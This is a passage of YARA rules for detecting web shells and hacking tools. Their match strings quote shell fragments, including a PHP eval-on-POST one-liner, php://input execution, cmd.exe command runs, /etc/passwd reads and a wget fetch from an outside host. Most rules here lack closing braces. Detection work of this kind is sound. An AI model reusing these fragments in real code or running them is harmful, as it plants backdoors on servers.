   		$s7 = "if($sertype == \"winda\"){" fullword
   		$s8 = "function execute($com)" fullword
   		$s12 = "echo decode(execute($cmd));" fullword
   		$s15 = "echo system($com);" fullword
   	condition:
   		4 of them
rule webshell_asp_404 {
   	// 404.asp: keyed on one fragment of the obfuscated body, so only this
   	// exact encoding of the sample is detected.
   	meta:
   		description = "Web Shell - file 404.asp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
   	strings:
   		$a0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2" ascii
   	condition:
   		all of ($a*)
rule winshell {
   	// winshell.exe (WinShell v5.0): RunServices autostart key, service
   	// name/description strings, URLDownloadToFileA / RegisterServiceProcess
   	// imports and the version banner. The two __*HEAP_SELECT* strings are
   	// MSVCRT environment-variable names present in many MSVC binaries and
   	// add nothing on their own; all nine strings are required.
   	meta:
   		description = "Webshells Auto-generated - file winshell.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "3144410a37dd4c29d004a814a294ea26"
   	strings:
   		$a0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices" ascii
   		$a1 = "WinShell Service" ascii
   		$a2 = "__GLOBAL_HEAP_SELECTED" ascii
   		$a3 = "__MSVCRT_HEAP_SELECT" ascii
   		$a4 = "Provide Windows CmdShell Service" ascii
   		$a5 = "URLDownloadToFileA" ascii
   		$a6 = "RegisterServiceProcess" ascii
   		$a7 = "GetModuleBaseNameA" ascii
   		$a8 = "WinShell v5.0 (C)2002 janker.org" ascii
   	condition:
   		all of ($a*)
rule HYTop2006_rar_Folder_2006Z {
   	// 2006Z.exe from the HYTop2006 package: an author credits list and a
   	// printf-style registry path under Keyboard Layouts. Both required.
   	meta:
   		description = "Webshells Auto-generated - file 2006Z.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "fd1b6129abd4ab177fed135e3b665488"
   	strings:
   		$a1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth" ascii
   		$a8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" ascii
   	condition:
   		all of ($a*)
rule webshell_php_ghost {
   	// ghost.php: the $OOO000000=urldecode('%61%68...') bootstrap of a
   	// PHP string-obfuscator, an HTML comment with a tracking-image URL, and
   	// a preg_replace(... 'e'.'v'.'a'.'l' ...) eval built from concatenated
   	// characters. All three required - the rule is tied to this packing.
   	meta:
   		description = "Web Shell - file ghost.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "38dc8383da0859dca82cf0c943dbf16d"
   	strings:
   		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
   		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
   		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
   	condition:
   		all of them
rule pwreveal {
   	// pwreveal.exe: auto-generated fragments, apparently pieces of a
   	// "<Blank - no password set> [Length=0 bytes]" message, a "JDiamondCS"
   	// marker and part of a registry path. All four required.
   	meta:
   		description = "Webshells Auto-generated - file pwreveal.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "b4e8447826a45b76ca45ba151a97ad50"
   	strings:
   		$a0 = "*<Blank - no es" ascii
   		$a3 = "JDiamondCS " ascii
   		$a8 = "sword set> [Leith=0 bytes]" ascii
   		$a9 = "ION\\System\\Floating-" ascii
   	condition:
   		all of ($a*)
rule WebShell_php_webshells_tryag {
   	// tryag.php (TrYaG Team shell): page title, the MySQL dump code
   	// (DROP/CREATE TABLE string building), a POST 'string' read and the
   	// file editor header. Three of five. $s3/$s7 are generic dump lines
   	// shared with the phpspy family (see webshell_shell_2008_... below),
   	// so $s1 or $s14 are what actually pin this to TrYaG.
   	meta:
   		description = "PHP Webshells Github Archive - file tryag.php"
   		author = "Florian Roth"
   		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"
   	strings:
   		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword
   		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword
   		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword
   		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword
   		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"
   	condition:
   		3 of them
rule webshell_webshells_new_con2 {
   	// con2.asp: $s7 is a reversed VBScript fragment ("eulaVtni" is
   	// "intValue", "htaPrewoP" is "PowerPath" read backwards), $s10 the
   	// edit form posted back to the same URL. Either one triggers.
   	meta:
   		description = "Web shells - generated from file con2.asp"
   		author = "Florian Roth"
   		date = "2014/03/28"
   		score = 70
   		hash = "d3584159ab299d546bd77c9654932ae3"
   	strings:
   		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
   		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
   	condition:
   		1 of them
rule webshell_browser_201_3_ma_download {
   	// Super rule over five JSP file-browser shells: the "jsp File Browser
   	// version <%= VERSION_NR%>" footer and a MIME-type chain on file
   	// extensions. Both required. The footer belongs to a publicly available
   	// file browser, so a legitimately deployed copy will match as well.
   	meta:
   		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		super_rule = 1
   		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
   		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
   		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
   		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
   		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
   	strings:
   		$a2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a" ascii
   		$a3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith" ascii
   	condition:
   		all of ($a*)
rule shelltools_g0t_root_uptime {
   	// uptime.exe: auto-generated fragments from a UPX-packed binary.
   	// $a2 is the standard UPX banner and matches any UPX-packed file;
   	// the other four are damaged string pieces. All five required.
   	meta:
   		description = "Webshells Auto-generated - file uptime.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
   	strings:
   		$a0 = "JDiamondCSlC~" ascii
   		$a1 = "CharactQA" ascii
   		$a2 = "$Info: This file is packed with the UPX executable packer $" ascii
   		$a5 = "HandlereateConso" ascii
   		$a7 = "ION\\System\\FloatingPo" ascii
   	condition:
   		all of ($a*)
rule WebShell_cgitelnet {
   	// cgitelnet (Perl CGI telnet-style shell): author homepage comment, the
   	// "command" action branch, a Windows NT comment and the upload
   	// progress message. Any two of the four.
   	meta:
   		description = "PHP Webshells Github Archive - file cgitelnet.php"
   		author = "Florian Roth"
   		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
   	strings:
   		$a9 = "# Author Homepage: http://www.rohitab.com/" fullword ascii
   		$a10 = "elsif($Action eq \"command\") # user wants to run a command" fullword ascii
   		$a18 = "# in a command line on Windows NT." fullword ascii
   		$a20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword ascii
   	condition:
   		2 of ($a*)
rule backdoor1_php {
   	// backdoor1.php (French UI): directory listing via PHP_SELF, the
   	// "class backdoor {" declaration and a copy-file link. Any one string
   	// triggers; "class backdoor {" is a plausible name in test or demo code
   	// and is the weakest of the three on its own.
   	meta:
   		description = "Semi-Auto-generated  - file backdoor1.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "e1adda1f866367f52de001257b4d6c98"
   	strings:
   		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
   		$s2 = "class backdoor {"
   		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
   	condition:
   		1 of them
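rule webshell_webshells_new_xxxx {
   	// xxxx.php: a minimal PHP one-liner that eval()s POST parameter 1.
   	// The generated string carried two trailing spaces copied from the
   	// sample; together with fullword that matched only that exact byte
   	// layout. The spaces are dropped so the tag followed by any
   	// non-alphanumeric byte (newline, space) still matches; every file the
   	// old string matched is still matched.
   	meta:
   		description = "Web shells - generated from file xxxx.php"
   		author = "Florian Roth"
   		date = "2014/03/28"
   		score = 70
   		hash = "5bcba70b2137375225d8eedcde2c0ebb"
   	strings:
   		$s0 = "<?php eval($_POST[1]);?>" fullword ascii
   	condition:
   		all of them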
rule WebShell_Generic_PHP_2 {
   	// Super rule over four PHP shells: fileto/filefrom copy handling, a
   	// Perl back-connect template ($port = ...), the temp.pl install path
   	// and the HTTP_POST_FILES upload code. Four of five. The same four
   	// hashes appear as hash1..hash4 of WebShell_Generic_PHP_6.
   	meta:
   		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
   		author = "Florian Roth"
   		super_rule = 1
   		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
   		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
   		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
   		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
   	strings:
   		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
   		$s4 = "\\$port = {$_POST['port']};" fullword
   		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
   		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
   		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
   	condition:
   		4 of them
rule JSP_jfigueiredo_APT_webshell_2 {
   	// A public JSP file manager (see reference) observed in use as a shell.
   	// $a1/$a2: rotator image div and jQuery dialog teardown from its HTML;
   	// $s1/$s2: the ServFMUpload multipart form and a hidden field whose
   	// value "L3BkZi8=" is base64 for "/pdf/". Either pair matches, so a
   	// legitimately deployed copy of the tool is flagged too (score 60).
   	meta:
   		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
   		author = "F.Roth"
   		date = "12.10.2014"
   		score = 60
   		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
   	strings:
   		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
   		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
   		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
   		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
   	condition:
   		all of ($a*) or all of ($s*)
rule hkdoordll {
   	// hkdoordll.dll: keyed on one uninstall error message. Single string,
   	// no fallback.
   	meta:
   		description = "Webshells Auto-generated - file hkdoordll.dll"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "b715c009d47686c0e62d0981efce2552"
   	strings:
   		$a6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is" ascii
   	condition:
   		all of ($a*)
rule webshell_phpkit_0_1a_odd {
   	// phpkit odd.php: include('php://input') runs the raw request body as
   	// PHP. $a1 is the executing line; the other three are the sample's own
   	// comments. Two of four required, so the code line plus any comment, or
   	// two comments alone, match.
   	meta:
   		description = "Web Shell - file odd.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "3c30399e7480c09276f412271f60ed01"
   	strings:
   		$a1 = "include('php://input');" fullword ascii
   		$a3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword ascii
   		$a4 = "// uses include('php://input') to execute arbritary code" fullword ascii
   		$a5 = "// php://input based backdoor" fullword ascii
   	condition:
   		2 of ($a*)
rule wh_bindshell_py {
   	// wh_bindshell.py (Python bind shell with an md5 password): usage
   	// comment, the one-liner that hashes the password, and a "bugz" note.
   	// Any one string triggers.
   	meta:
   		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "fab20902862736e24aaae275af5e049c"
   	strings:
   		$a0 = "#Use: python wh_bindshell.py [port] [password]" ascii
   		$a2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword ascii
   		$a3 = "#bugz: ctrl+c etc =script stoped=" fullword ascii
   	condition:
   		any of ($a*)
rule webshell_Shell_ci_Biz_was_here_c100_v_xxx {
   	// Super rule over three c100/c99-mod shells: a SOCKS-style error check
   	// on $data{0}/$data{1} and four entries from the preset command
   	// <OPTION> list (world-writable file search, cpuinfo, wget, passwd
   	// parsing). Two of five required. The same three hashes are also
   	// hash3/hash5/hash7 of webshell_c99_c99shell_c99_w4cking_Shell_xxx.
   	meta:
   		description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		super_rule = 1
   		hash0 = "f2fa878de03732fbf5c86d656467ff50"
   		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
   		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
   	strings:
   		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
   		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
   		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
   		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
   		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
   	condition:
   		2 of them
rule webshell_2_520_job_ma1_ma4_2 {
   	// Super rule over six JSP shells sharing a SQL Server JDBC connector:
   	// the jdbc:microsoft:sqlserver:// URL built from dbServer/dbPort and a
   	// meta-refresh redirect back to the request URL. Both required.
   	// The JDBC line is plain database code; $s9 is what ties it to the shell.
   	meta:
   		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		super_rule = 1
   		hash0 = "64a3bf9142b045b9062b204db39d4d57"
   		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
   		hash2 = "56c005690da2558690c4aa305a31ad37"
   		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
   		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
   		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
   	strings:
   		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
   		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
   	condition:
   		all of them
rule webshell_webshells_new_php6 {
   	// php6.php: array_map() with a callback name ("asx73ert" is "assert"
   	// with junk letters), a preg_replace() using the /e modifier (which
   	// evaluates the replacement as PHP), and a shell.php?qid= URL. Any one
   	// triggers. $s4 keeps two trailing spaces from the sample and is
   	// fullword, so it only matches that exact spacing.
   	meta:
   		description = "Web shells - generated from file php6.php"
   		author = "Florian Roth"
   		date = "2014/03/28"
   		score = 70
   		hash = "ea75280224a735f1e445d244acdfeb7b"
   	strings:
   		$s1 = "array_map(\"asx73ert\",(ar"
   		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
   		$s4 = "shell.php?qid=zxexp  " fullword
   	condition:
   		1 of them
rule shelltools_g0t_root_resolve {
   	// resolve.exe: seven auto-generated fragments of (mostly) compressed or
   	// damaged data. None is meaningful alone; all seven must co-occur.
   	meta:
   		description = "Webshells Auto-generated - file resolve.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "69bf9aa296238610a0e05f99b5540297"
   	strings:
   		$a0 = "3^n6B(Ed3" ascii
   		$a1 = "^uldn'Vt(x" ascii
   		$a2 = "\\= uPKfp" ascii
   		$a3 = "'r.axV<ad" ascii
   		$a4 = "p,modoi$=sr(" ascii
   		$a5 = "DiamondC8S t" ascii
   		$a6 = "`lQ9fX<ZvJW" ascii
   	condition:
   		all of ($a*)
rule WebShell_php_webshells_kral {
   	// kral.php (Turkish UI, "Server listeleyici"): gethostbyname lookup,
   	// a cURL POST of domain=..., a Joomla com_user reset URL, an "Access"
   	// result line and the author credit. Two of six. $s1 and $s3 are
   	// ordinary PHP and should not be the only two that hit.
   	meta:
   		description = "PHP Webshells Github Archive - file kral.php"
   		author = "Florian Roth"
   		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
   	strings:
   		$s1 = "$adres=gethostbyname($ip);" fullword
   		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
   		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
   		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
   		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
   		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
   	condition:
   		2 of them
rule by063cli {
   	// by063cli.exe (client side of a two-part tool): a "#popmsg" greeting
   	// and a connect-failure message. Both required.
   	meta:
   		description = "Webshells Auto-generated - file by063cli.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "49ce26eb97fd13b6d92a5e5d169db859"
   	strings:
   		$a2 = "#popmsghello,are you all right?" ascii
   		$a4 = "connect failed,check your network and remote ip." ascii
   	condition:
   		all of ($a*)
rule webshell_jsp_cmdjsp {
   	// cmdjsp.jsp: keyed on the GET form that posts to the file's own name.
   	// Single string, no fallback; a renamed copy escapes it.
   	meta:
   		description = "Web Shell - file cmdjsp.jsp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "b815611cc39f17f05a73444d699341d4"
   	strings:
   		$a5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword ascii
   	condition:
   		all of ($a*)
rule FSO_s_cmd {
   	// cmd.asp: prints \\computer\user via WScript.Network and runs
   	// "cmd.exe /c <cmd> > <tempfile>" through WScript.Shell. Both required.
   	meta:
   		description = "Webshells Auto-generated - file cmd.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
   	strings:
   		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
   		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
   	condition:
   		all of them
rule webshell_asp_EFSO_2 {
   	// EFSO_2.asp: one fragment of the Script-Encoded body. Single string,
   	// tied to this exact encoding. FSO_s_EFSO_2_2 covers the same sample
   	// hash with two other encoded fragments.
   	meta:
   		description = "Web Shell - file EFSO_2.asp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "a341270f9ebd01320a7490c12cb2e64c"
   	strings:
   		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
   	condition:
   		all of them
rule webshell_Safe_mode_breaker {
   	// "Safe mode breaker": a regex over PHP's "SAFE MODE Restriction in
   	// effect ... whose uid is" warning text (used to learn file owners),
   	// and a path-join line on $root. Either string triggers.
   	meta:
   		description = "Web Shell - file Safe mode breaker.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "5bd07ccb1111950a5b47327946bfa194"
   	strings:
   		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
   		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
   	condition:
   		1 of them
rule WebShell_ru24_post_sh {
   	// ru24_post_sh.php: team URL, the default command set when POST 'cmd'
   	// is empty, the shell's name, author credit and the $function=passthru
   	// line. Any one string triggers, so the bare URL $s1 or the author tag
   	// $s7 will fire on any file that merely mentions them.
   	meta:
   		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
   		author = "Florian Roth"
   		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
   	strings:
   		$s1 = "http://www.ru24-team.net" fullword
   		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
   		$s6 = "Ru24PostWebShell"
   		$s7 = "Writed by DreAmeRz" fullword
   		$s9 = "$function=passthru; // system, exec, cmd" fullword
   	condition:
   		1 of them
rule PasswordReminder {
   	// PasswordReminder.exe: keyed on one printf-style status message about
   	// the location and length of an encoded password. Single string.
   	meta:
   		description = "Webshells Auto-generated - file PasswordReminder.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
   	strings:
   		$a3 = "The encoded password is found at 0x%8.8lx and has a length of %d." ascii
   	condition:
   		all of ($a*)
rule BIN_Server {
   	// Server.exe: two generic Win32 import names (GetLogicalDrives,
   	// WinExec) plus four custom protocol/config tokens (configserver,
   	// fxftest, upfileok, upfileer). All six required; the custom tokens are
   	// what make the rule specific.
   	meta:
   		description = "Webshells Auto-generated - file Server.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
   	strings:
   		$a0 = "configserver" ascii
   		$a1 = "GetLogicalDrives" ascii
   		$a2 = "WinExec" ascii
   		$a4 = "fxftest" ascii
   		$a5 = "upfileok" ascii
   		$a7 = "upfileer" ascii
   	condition:
   		all of ($a*)
rule Webshell_Backdoor_PHP_Agent_r57_mod_bizzz_shell_r57 {
   	// r57 family (eleven SHA-256 hashes): the which('...') default-command
   	// assignment into $_POST['cmd'] and the $blah = ex( call of r57's
   	// execution wrapper. Both required, under 600KB.
   	meta:
   		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
   		author = "Florian Roth"
   		reference = "https://github.com/nikicat/web-malware-collection"
   		date = "2016-01-11"
   		score = 70
   		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
   		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
   		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
   		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
   		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
   		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
   		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
   		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
   		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
   		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
   		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
   	strings:
   		$s1 = "$_POST['cmd'] = which('" ascii
   		$s2 = "$blah = ex(" fullword ascii
   	condition:
   		filesize < 600KB and all of them
rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
   	// Super rule over seven phpspy-derived shells, keyed on their shared
   	// MySQL dump routine (mysql_escape_string of row values, each() over
   	// the index list, DROP TABLE / PRIMARY KEY string building). Two of the
   	// $s* lines, AND NOT $fn: the "filename: backup" string excludes a
   	// legitimate backup script that carries the same dump code, which is
   	// also why the score is 60 rather than 70.
   	meta:
   		description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 60
   		super_rule = 1
   		hash0 = "791708057d8b429d91357d38edf43cc0"
   		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
   		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
   		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
   		hash4 = "40a1f840111996ff7200d18968e42cfe"
   		hash5 = "e0202adff532b28ef1ba206cf95962f2"
   		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
   	strings:
   		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
   		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
   		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
   		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
   		$fn = "filename: backup"
   	condition:
   		2 of ($s*) and not $fn
rule mysql_shell_php {
   	// mysql_shell.php: author name, author e-mail and a deleteData link
   	// from the table browser. Any one string triggers, so $s0 and $s1
   	// (a person's name and address) will hit any file that credits the
   	// same author; only $s2 is actual shell code.
   	meta:
   		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "d42aec2891214cace99b3eb9f3e21a63"
   	strings:
   		$s0 = "SooMin Kim"
   		$s1 = "smkim@popeye.snu.ac.kr"
   		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
   	condition:
   		1 of them
rule webshell_cpg_143_incl_xpl {
   	// cpg_143_incl_xpl.php (Coppermine 1.4.3 include exploit script): the
   	// urlencoded username/password POST body and an fputs() that writes a
   	// "Hi Master!" PHP stub with ini_set(max_execution_time...). Either
   	// string triggers.
   	meta:
   		description = "Web Shell - file cpg_143_incl_xpl.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "5937b131b67d8e0afdbd589251a5e176"
   	strings:
   		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
   		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
   	condition:
   		1 of them
rule installer {
   	// installer.cmd: two menu labels that name Vanquish (presumably the
   	// rootkit of that name; the sample name is all the rule gives).
   	// Both required.
   	meta:
   		description = "Webshells Auto-generated - file installer.cmd"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "a507919ae701cf7e42fa441d3ad95f8f"
   	strings:
   		$a0 = "Restore Old Vanquish" ascii
   		$a4 = "ReInstall Vanquish" ascii
   	condition:
   		all of ($a*)
rule WebShell_ftpsearch {
   	// ftpsearch.php: reads /etc/passwd and tries FTP logins against
   	// 127.0.0.1 for each user; strings are its error/status messages and a
   	// "KingDefacer" title. Two of four. $s9 alone is ordinary PHP.
   	meta:
   		description = "PHP Webshells Github Archive - file ftpsearch.php"
   		author = "Florian Roth"
   		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
   	strings:
   		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
   		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
   		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
   		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
   	condition:
   		2 of them
rule Pastebin_Webshell {
    // Web shell that fetches its payload from pastebin.com. Three independent
    // triggers: any single pastebin fetch call, or the complete evex.php
    // writer pair, or the complete WordPress-header/login_ok trio.
    // NOTE: a $fetch* string on its own also matches benign PHP that merely
    // reads from pastebin; that is inherent to the original rule design.
    meta:
        description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
        author = "Florian Roth"
        score = 70
        date = "13.01.2015"
        reference = "http://goo.gl/7dbyZs"
    strings:
        // payload retrieval from pastebin
        $fetch1 = "file_get_contents(\"http://pastebin.com" ascii
        $fetch2 = "xcurl('http://pastebin.com/download.php" ascii
        $fetch3 = "xcurl('http://pastebin.com/raw.php" ascii
        // evex.php drop/replace logic
        $evex1 = "if($content){unlink('evex.php');" ascii
        $evex2 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
        // variant that rewrites a WordPress plugin header and reports login_ok
        $wp1 = "file_put_contents($pth" ascii
        $wp2 = "echo \"<login_ok>" ascii
        $wp3 = "str_replace('* @package Wordpress',$temp" ascii
    condition:
        any of ($fetch*) or all of ($evex*) or all of ($wp*)
}
rule HYTop_DevPack_fso {
    // HYTop DevPack fso.asp: page marker plus the line that writes a
    // server-side VBScript stub via theFile.writeLine(). Both required.
    meta:
        description = "Webshells Auto-generated - file fso.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "b37f3cde1a08890bd822a182c3a881f6"
    strings:
        $page_marker = "<!-- PageFSO Below -->"
        $write_stub  = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
    condition:
        $page_marker and $write_stub
}
rule ASPXspy2 {
    // ASPXspy2 ASP.NET web shell (Bin, rootkit.net.cn). Fourteen fragments
    // covering its Serv-U style user setup block, SQL executor, process and
    // service listing, registry browser, file download and credits; six of
    // them must be present.
    meta:
        description = "Web shell - file ASPXspy2.aspx"
